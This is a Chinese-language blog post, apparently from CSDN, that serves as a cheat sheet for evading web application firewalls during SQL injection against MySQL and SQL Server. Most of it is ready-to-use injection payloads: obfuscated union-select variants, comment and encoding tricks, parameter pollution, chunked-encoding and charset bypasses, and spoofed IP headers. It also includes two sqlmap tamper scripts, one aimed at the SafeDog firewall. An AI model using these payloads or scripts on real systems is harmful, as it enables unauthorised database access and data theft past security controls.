对基于正则表达式的WAF,我们猜测安全工程师写WAF规则时,可能不知道函数名与左括号之间可以存在特殊字符,或者遗漏可以存在特殊字符。例如匹配函数”concat()”的规则写法,“concat(”或者”concat\s*(”,就没有考虑到一些特殊字符。相应的绕过方法,在特殊位置引入特殊的分隔符,逐个测试。这些特殊分隔符发现也是通过Fuzz出来的。
绕过技巧:•函数与括号之间可以插入空白符或多行注释达到绕过•GET型请求转POST型
id=-1' union select null,concat_ws(char%0a%0d(32,58,32),user,password) from users #

绕过方式3:协议未覆盖绕过(mysql)
文件头的属性是传输前对提交的数据进行编码发送到服务器。其中 multipart/form-data 表示该数据被编码为一条消息,页上的每个控件对应消息中的一个部分。所以,当 waf 没有规则匹配该协议传输的数据时可被绕过。
绕过技巧:在 http 头里的 Content-Type 提交表单支持四种协议:
Content-Type: text/html;
Content-Type: application/json;charset:utf-8;
Content-Type:type/subtype ;parameter
Content-Type:application/x-www-form-urlencoded
Content-Type:multipart/form-data
使用表单请求中的multipart/form-data•关键词换行•GET型请求转POST型

id=-1' union select null,concat_ws

(char(32,58,32),user,password) 

from users #

绕过方式4:多行注释符替换绕过(mysql)
select/**/*/**/from/**/[dbo].[User]/**/where id=1

绕过方式5:HPP分割参数绕过(sqlserver)
绕过原理规则缺陷/特性:HTTP参数污染
HPP是HTTP Parameter Pollution的缩写,意为HTTP参数污染。
在ASPX中,有一个比较特殊的HPP特性,当GET/POST/COOKIE同时提交的参数id,服务端接收参数id的顺序GET,POST,COOKIE,中间通过逗号链接,于是就有了这个idea。
UNION、SELECT、FROM 三个关键字分别放在GET/POST/COOKIE的位置,通过ASPX的这个特性连起来,堪称完美的一个姿势,压根不好防。
但姿势利用太过于局限:使用Request.Params["id"]来获取参数,G-P-C获取到参数拼接起来,仅仅作为Bypass分享一种思路而已。
绕过技巧:•GET型请求转POST型•参数传递的顺序:GET->POST->COOKIE•使用多行注释符/**/来闭合分割参数的逗号
post方式 id=get,cookie里面 id=cookie, 包里面 id=post
get 方式 id=11111111111111&id=')+and+1=db_name()--+-  双写id

绕过方式6:chunked
普通的sqlmap是没有--chunk这个参数可以使用的  sqlmap  --tamper=chunkedtamper.py
chunkedtamper.py:内容
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time    : 2019/3/12 5:45 PM
# @Author  : w8ay
# @File    : chunk.py

"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.enums import PRIORITY
from random import sample

__priority__ = PRIORITY.NORMAL


def dependencies():
    pass


def randomIP():
    numbers = []

    while not numbers or numbers[0] in (10, 172, 192):
        numbers = sample(xrange(1, 255), 4)

    return '.'.join(str(_) for _ in numbers)


def tamper(payload, **kwargs):
    """
    Append a fake HTTP header 'X-Forwarded-For'
    """

    headers = kwargs.get("headers", {})
    headers["Transfer-Encoding"] = "Chunked"
    print "tamper"
    print payload
    # return payload
    payload = "\r\n" + "2" + "\r\n" + "id" + "\r\n" + "0" + "\r\n\r\n"
    return payload


绕过方式7:ip伪造头
X-Forwarded-For:127.0.0.1
X-Forwarded-Host:127.0.0.1
X-Client-IP:127.0.0.1
X-remote-IP:127.0.0.1
X-remote-addr:127.0.0.1
True-Client-IP:127.0.0.1
X-Client-IP:127.0.0.1
Client-IP:127.0.0.1
X-Real-IP:127.0.0.1

绕过方式8:利用multipart/form-data 绕过
http 头里的Content-Type 提交表单支持三种协议
application/x-www-form-urlencoded 编码模式post 提交
multipart/form-data 文件上传模式
text/plain 文本模式
Content-Type: multipart/form-data;
boundary=---------------------------28566904301101419271642457175
boundary 这是用来匹配的值
Content-Disposition: form-data; name="id" 这也能作为post 提交
所以程序会接收到构造的SQL 注入语句-1 union select 1,user()


绕过方式9:url二次编码绕过

绕过方式10:白名单绕过。
白名单通常有目录
/admin
/phpmyadmin
/admin.php
/index.php/1.jpg&id=1
/index.php/1.jpg=/1.jpg&id=1
/1.css=/1.css&id=1

绕过方式11:pipline 绕过注入
用burpsuite 抓包提交复制整个包信息放在第一个包最后,把第一个包close 改成keep-alive 把
brupsuite 自动更新Content-Length 勾去掉。

漏洞12:post,OPTIONS,HEAD绕过
有些waf 只要存在GET 或者POST 优先匹配POST 从而导致被绕过。
有些程序是json 提交参数,程序也是json 接收再拼接到SQL 执行json 格式通常不会被拦截。所以可以绕过waf.
{'id':1 union select 1,2,3,'submit':1}
同样text/xml 也不会被拦截
POST GET传数据都会被waf拦截,将请求方式修改为OPTIONS,HEAD等成功绕过了waf

漏洞13: 花扩号绕过
select 1,2 union select{x 1},user()

漏洞14:HTTP 数据编码绕过
改Content-Type 中的charset 的参数值,我们改为ibm037 这个协议编码
Content-Type: application/x-www-form-urlencoded;charset:ibm037
未编码
id=123&pass=pass%3d1
透过IBM037 编码
%89%84=%F1%F2%F3&%97%81%A2%A2=%97%81%A2%A2~%F1


1.  and 绕过

使用 || 代替 or
使用&&代替and
&& 1=1
&& 1=2
|| 1=0
|| 1=1
+or+0x3a!=1--+
+or+0x3a=1--+
and (select 1)=(Select 0x1)
and (select 1)=(Select 0xA*1000)
and ~1>1
and 1=1
and 1=2
and -2<-1
and hex(1)>~1
and hex(1)>-1
and true=true --+
and!!!!1=1
and/*@%$^(*/ 1=1
or 1=0
or 1=1

2.  order by 绕过
/&id=1308%20order%20by%2035&b=/
into @a,@b,@c,@d;
order /*//--/*/ by
Order%A0By
order/**/by
order/*--*/by
order/*//*/by
order/**/by

3.  union select  绕过
%09union%09select 1,2
%0aunion%0aselect 1,2
%0baunion%0bselect 1,2
%0caunion%0cselect 1,2
%0d%0aunion%0d%0aselect 1,2
%0daunion%0dselect 1,2
--%0dunion select
%23?%0auion%20?%23?%0aselect   
%23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect   
%23x%0A/*!database*/()
%25%37%35%25%36%45%25%36%39%25%36%46%25%36%45%25%32%30%25%37%33%25%36%35%25%36%43%25%36%35%25%36%33%25%37%34
%250aunion%250aselect 1,2
%252f%252a*/union%252f%252a /select%252f%252a*/ 
%2f**%2funion%2f**%2fselect 
%2f**%2funion%2f**%2fselect%2f**%2f 
%53eLEct
%55nion %53eLEct   
%55nion(%53elect 1,2,3)-- - 
%55nion(%53elect)
%75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7
(select 1)=(select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)/*!union*/
*9e0UnIoN
*9e0UnIoN*9e0slect
/%2A%2A/union/%2A%2A/select/%2A%2A/
/* */union/* */select/ */1,2;
/*!%53eLEct*/
/*!%55NiOn*/ /*!%53eLEct*/ 
/*!12345union*//*!12345select*/1,2;
/*!40000union*//*!40000select*/1,2
/*!50000UniON SeLeCt*/ 
/*!50000union*//*!50000select*/1,2
/*!select*/
/*!u%6eion*/ /*!se%6cect*/ 
/*!uNIOn*/ /*!SelECt*/ 
/*!union*//*!00000all*//*!00000select*/1,2
/*!union*//*!select*/1,2
/*!union*/+/*!select*/ 
/*!UnIoN*/SeLecT+  
/**//*!12345UNION SELECT*//**/ 
/**//*!50000UNION SELECT*//**/ 
/**//*!union*//**//*!select*//**/ 
/**/UNION/**//*!50000SELECT*//**/ 
/**/union/**/select/**/ 
/*--*/union/*--*/select/*--*/ 
/*中文*/union/*中文*/select/*中文*/1,2;
\Nselect
\Nunion
+#1q%0AuNiOn all#qa%0A#%0AsEleCt 
+#uNiOn+#sEleCt 
--+%0d%0aunion--+%0d%0aselect--+%0d%0a1,--+%0d%0a2
+un/**/ion+se/**/lect 
+uni%0bon+se%0blect+ 
+UnIOn%0d%0aSeleCt%0d%0a 
+union+distinct+select+ 
+union+distinctROW+select+ 
+UNunionION+SEselectLECT+ 
and(select 1)=(Select 0xA*1000)/*!uNIOn*//*!SeLECt*/ 1,user()
e0union(select!1,)
e0union(select(1),(select user from user limit 1)
e0union(select(1),)
e0union(select/!50000/1,)
e0union(select@'id',)
e0union(select{1},)
e0union(select~1,)
e0union(select+1,)
e0union(select'1',(select user from user limit 1)
e0union(select'1',)
e0union(select-1,)
null+UNION+SELECT+1,2
REVERSE(noinu)+REVERSE(tceles) 
s%u0065lect
se%0blect
sel%e%ct
sele%ct
sele/**/ct
select union select{x 1},
u%6eion s%65lect
u%6eion se%6cect   
un?+un/**/ion+se/**/lect+
uni%0bon+se%0blect 
uni%6fn distinct%52OW s%65lect
uni%u006fn sel%u0065ct
unio%6e %73elect   
unio%6e%20%64istinc%74%20%73elect   
union  -- 1%0a select
union  -- hex()%0a select
union %23%0aall select
union (/*!/**/ SeleCT */ 1,2,3) 
union (select)
union /*!50000%53elect*/ 
union /*//--/*/ select
union /*@%$^(*/ select 
union /*@%$^(*/ select --+
union all select
union all select 1,2
union all%23%0a select
union DISTINCT select
union DISTINCT select 1,2
UnIoN SeLeCt
union select * from (select 1)a join (select 2)b join(select user())c join(select 4)d******;
union select 1,(select(schema_name)from(information_schema.SCHEMATA)limit 0,1)
union select 1,(select(schema_name)from/*!12345information_schema.SCHEMATA*/limit 0,1)
union select 1,(select(schema_name)from{x information_schema.SCHEMATA}limit 0,1)
uNIoN sELecT 1,2
union select all
union select DISTINCT
union%20%64istinctRO%57%20select   
union%20/*!44509select*/%20
union%2053elect   
union%20all%23%0a%20select%20
union%20distinct%20select   
union%20select%20
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A 
union%a0%0aselect 1,'2',
union%a0%0aselect 1,'2','3',
union(select%0aall{x users}from{x ddd})
union(select%0adistinct{x users}from{x ddd})
union(select%0adistinctrow{x users}from{x ddd})
union/*!23000select*/
union/*%00*/%23a%0A/*!/*!select
union/*%00*/%23a%0A/*!/*!select%20
union/*%0a%0b%20%a0--*/select
UNION/*&test=1*/SELECT/*&pwn=2*/ 
union/*&username=*/select
union/**/select/**/1,2
union/*/!*!**/select
union/*/!--**/select
UNION/*/%21*%21**/SELECT
union/*/-*!!*/select
union/*//\\\*/select+1,2--+
union/*//--\\\*/select+1,2--+
UNiOn/*/1/*/select
UNiOn--+%02%0d%0aselect    
union+/*!select*/ 
union+distinctROW+select
UNIunionONSeLselectECT
ununionion selselectect
user/**/()--+


 过滤了%23%0a 却不过滤%2d%2d%0a

4.  database() 绕过
%23x%0A/*!database*/()
and+0x3a!=info()--
database /*//--/*/ ()
database%23x%0A()
database()||’
database/*!20553()*/--+
database/**/()
database/*xxx*/()
database+()
db_name()
user/**/()--+


union select+1, (select+password+from+`users`+limit+1)--+
union/*//--//*/select+1,(select+password+from+`users`+limit+1)--
1'||1=geometryCollection(updatexml(1,concat(0x7e,database(),0x7e),1))--+
 UnIoN%A0SeLeCT*FrOm(SeLeCt 1)a JOIN (SeLeCt 2)b JOIN (SeLeCt 3)c JOIN (SeLeCt 4)d JOIN (SeLeCt 5)e JOIN (SeLeCt 6)f JOIN (SeLeCt 7)g JOIN (SeLeCt 8)h JOIN (SeLeCt 9)i JOIN (SeLeCt 10)j JOIN (SeLeCt 11)k JOIN (SeLeCt 12)l JOIN (SeLeCt 13)m JOIN (SeLeCt 14)n JOIN (SeLeCt 15)o JOIN (SeLeCt 16)p JOIN (SeLeCt 17)q JOIN (SeLeCt 18)r JOIN (SeLeCt 19)s JOIN (SeLeCt 20)t JOIN (SeLeCt 21)w JOIN (SeLeCt 22)x JOIN (SeLeCt 23)y JOIN (SeLeCt 24)z JOIN (SeLeCt 25)2a-- -

5.  from    绕过
%23%0afrom
%2d%2d%0afrom
%2d%2d%0from
%a0from
/*!%23/*%0afrom*/
/*!00000%23/*%0afrom*/
/*!from*/
\Nfrom
1efrom
2.0 from
8e0from
CHAR(102, 114, 111, 109)
e0FrOm
FrOFrOmm
FrOm
from/*!--+/*%0ainformation_schema.columns*/
select(1)from
select{x user}from{x mysql.user};

6.  information_schema的绕过
`information_schema`.schemata
`information_schema`.`schemata`
information_schema.`schemata`
(information_schema.schemata)
information_schema/**/.schemata
Information_schema./**_**/Tables

7:单引号绕过'
""      (mysql) 
select * from users where username=0x61646D696E;   #   select * from users where username='admin';   select hex('admin');
库名.表名:admin.users
admin+.user
select{x user}from{x mysql.user};

8.   substr截取字符绕过
查询m 等于select(substr(database() from 1 for 1))页面返回正常
select * from users where id=1 and 'm'=(select(substr(database() from 1 for 1)));
可以进一步优化m 换成hex 0x6D 这样就避免了单引号
select * from users where id=1 and 0x6D=(select(substr(database() from 1 for 1)));

substr 函数被拦截 换成 mid
select * from users where id=1 and 'm'=(select(mid(database() from 1 for 1)));
select * from users where id=1 and 0x6D=(select(mid(database() fm 1 for 1)));

9.  limit拦截
limit 1 默认返回第一条数据。也可以使用limit 1 offset 0 从零开始返回第一条记录.
可以用以下等价函数代替来绕过过滤:
1、sleep函数可以用benchmark函数代替
2、ascii函数可以用hex, bin函数代替
3、group_concat函数可以用concat_ws函数代替
4、updatexml函数可以用extractvalue函数代替
AND 等价于 &&
OR 等价于 ||
= 等价于 like
+ 代替 空格
sleep() 等价于 benchmark()
mid()substring() 等价于 substr()
Mid(version(),1,1)
Substr(version(),1,1)
Substring(version(),1,1)
Lpad(version(),1,1)
Rpad(version(),1,1)
Left(version(),1)
reverse(right(reverse(version()),1)
concat(version(),'|',user());
concat_ws('|',1,2,3)
Char(49)
Substring(@@version,1,1)
Left(@@version,1)
Right(@@version,1)
limit 1 offset 0
mid(version() from 1 for 1)
Hex(‘a’)
Unhex(61)
Ascii(1)
用like或in代替=
select * from user where username='user';
select * from user where username like 'user';
select * from user where username in('user');
and exp(~(select * from(select user())x));--+
and exp(~(select%23%0apassword%23%0afrom(select%23%0auser())x));--+
http://id/index.php?id=1 and 1 like 1
like "[%23]" /*!10440union select*/
试延时 payload,将里面的 o 替换为 %u00ba

7. 普通函数的绕过
如:
'
"
.
`users`
~
hex(user/**/(/**/))
8. 报错注入函数的绕过
/*!5000updatexml*/(1,1,1)
/*!11440updatexml*/(1,1,1)
/*!11441extractvalue*/(1, concat(0x5c, (SELECT @@version)))
`updatexml`(1,(select @@version),1)
总之,将报错函数用/*!*/或者``包括起来。
报错注入中使用polygon()函数替换常用的updatexml()函数select polygon((select * from (select * from (select @@version) f) x));


盲注绕过&延时绕过
and!!!!if((substr((select hex(user/**/(/*!*/))),1,1)>1),sleep/**/(/*!5*/),1)
and!!!!1=1    除了!还可以使用~&-        当符号数量为偶数时为真,相当于一个空格,可以用来绕过and后不能使用数字或者字符。


apache特性:
&id=1&id=2     他只解析最后一个

MySQL特性:
空格可以由其它字符替代

select id,contents,time from news where 
news_id=1①union②select③1,2,username④from⑤admin
•位置①
•可以利用其它控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0•可以利用注释符号替换空格:/**/、%23est%0d%0a、 --+a%0d%0a•可以利用数学运算以及数据类型:news_id=1.0,news_id=1E0,news_id=\N
•位置②
•可以利用其它控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0•可以利用注释符号替换空格:/**/、%23test%0d%0a、 --+a%0d%0a•可以利用括号:union(select 1,2)
•位置③
•可以利用其它控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0•可以利用注释符号替换空格:/**/、%23test%0d%0a、 --+a%0d%0a•可以利用其它符号:+ 、- 、 ~ 、!、@•位置④
•可以利用其它控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0•可以利用注释符号替换空格:/**/、%23test%0d%0a、 --+a%0d%0a•大括号{}:union select {``1},{x 2}•可利用数学运算以及数据类型:
union select usename,2.0from admin union select username,8e0from admin union select username,\Nfrom admin
•位置⑤
•可以利用其它控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0•可以利用注释符号替换空格:/**/、%23test%0d%0a、 --+a%0d%0a•反引号`:union select 1,table_name,3 from`information_schema`.`tables`limit 0,1%23•内联注释:union select 1,table_name,3 from /*!50001information_schema.tables*/ limit 0,1%23•大括号{}:union select 1,table_name,3 from{x information_schema.tables}limit 0,1%23•小括号():union select 1,table_name,3 from(information_schema.tables)limit 0,1%23


SQLServer特性
空格可以由其它字符替代

select id,contents,time from news where news_id=1①union②select③1,2,db_name()④from⑤admin

位置①
可以利用其它控制字符替换空格:%01~%0F、%11~%1F
可以利用注释符号:/**/、—+a%0d%0a
可利用数学运算符以及数据类型:news_id=1.0,news_id=1e0,news_id=1-1
位置②
可以利用其它控制字符替换空格:%01~%0F、%11~%1F
可以利用注释符号:/**/、—+a%0d%0a
可以利用加号+替换空格:union+select
位置③
可以利用其它控制字符替换空格:%01~%0F、%11~%1F
可以利用注释符号:/**/、—+a%0d%0a
可利用数学运算符:+、-、~、. (注:其中-、~、.号必须是select查询的第一个字段的数据类型为数字型才能使用)
可以利用小括号()替换空格:select(1),2,db_name()
位置④
可以利用其它控制字符替换空格:%01~%0F、%11~%1F
可以利用注释符号:/**/、—+a%0d%0a
可利用其他字符:%80~%FF(需要IIS服务器支持)
位置⑤
可以利用其它控制字符替换空格:%01~%0F、%11~%1F
可以利用注释符号:/**/、—+a%0d%0a
可利用其他字符:%80~%FF(需要IIS服务器支持)
可以利用点号.替换空格:from.users
可以利用中括号[]替换空格:from[users]


Unicode编码

常用的几个符号的一些Unicode编码:

单引号: %u0027、%u02b9、%u02bc、%u02c8、%u2032、%uff07、%c0%27、%c0%a7、%e0%80%a7
空格:%u0020、%uff00、%c0%20、%c0%a0、%e0%80%a0
左括号:%u0028、%uff08、%c0%28、%c0%a8、%e0%80%a8
右括号:%u0029、%uff09、%c0%29、%c0%a9、%e0%80%a9

​

mysql sqlmap tamper

#%21/usr/bin/env python

# MySQLByPassForSafeDog
# Code By:Tas9er

import re
import string
import os
import random

from lib.core.enums import DBMS
from lib.core.common import singleTimeWarnMessage

def dependencies():
    singleTimeWarnMessage("MySQLByPassForSafeDog / Code By:Tas9er '%s' only %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
    
def tamper(payload, **kwargs):
    payload=payload.replace('AND','/*%2144575%26%26*/')
    payload=payload.replace('ORD','/*%2144575ORD*/')
    payload=payload.replace('OR ','/*%2144575OR*/ ')
    payload=payload.replace('UNION SELECT','UNION/*/%21*%21**/SELECT')
    payload=payload.replace('ORDER BY',str(caonimabi())+'ORDER/**/BY')
    payload=payload.replace('information_schema.tables','/*!%23%0ainformation_schema.tables*/')
    payload=payload.replace('@','/*%2144575%40*/')
    payload=payload.replace('SELECT','/*%2144575%53%45%4c%45%43%54*/')
    payload=payload.replace('table_name',str(caonimabi())+'table_name')
    payload=payload.replace('MID',str(caonimabi())+'MID')
    payload=payload.replace('CAST',str(caonimabi())+'CAST')
    payload=payload.replace('USER()','%23a%0aUSER/*!*/()')
    payload=payload.replace('CURRENT_%23a%0aUSER/*!*/()',str(caonimabi())+'CURRENT_USER()')
    payload=payload.replace('SESSION_%23a%0aUSER/*!*/()','%23a%0aSESSION_USER()')
    payload=payload.replace('()','/*%2144575%28%29*/')
    payload=payload.replace(' (','/**/(')
    payload=payload.replace(',(',',/**/(')
    payload=payload.replace('),',')/**/,')
    payload=payload.replace(') ',')/**/')
    payload=payload.replace('/','%2F')
    payload=payload.replace('*','%2A')
    return payload
    
def caonimabi():
    temp = ''.join(random.sample(string.ascii_letters + string.digits, random.randint(3,9)))
    return '/*Tas9er'+temp+'*/'
    

  • 9
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值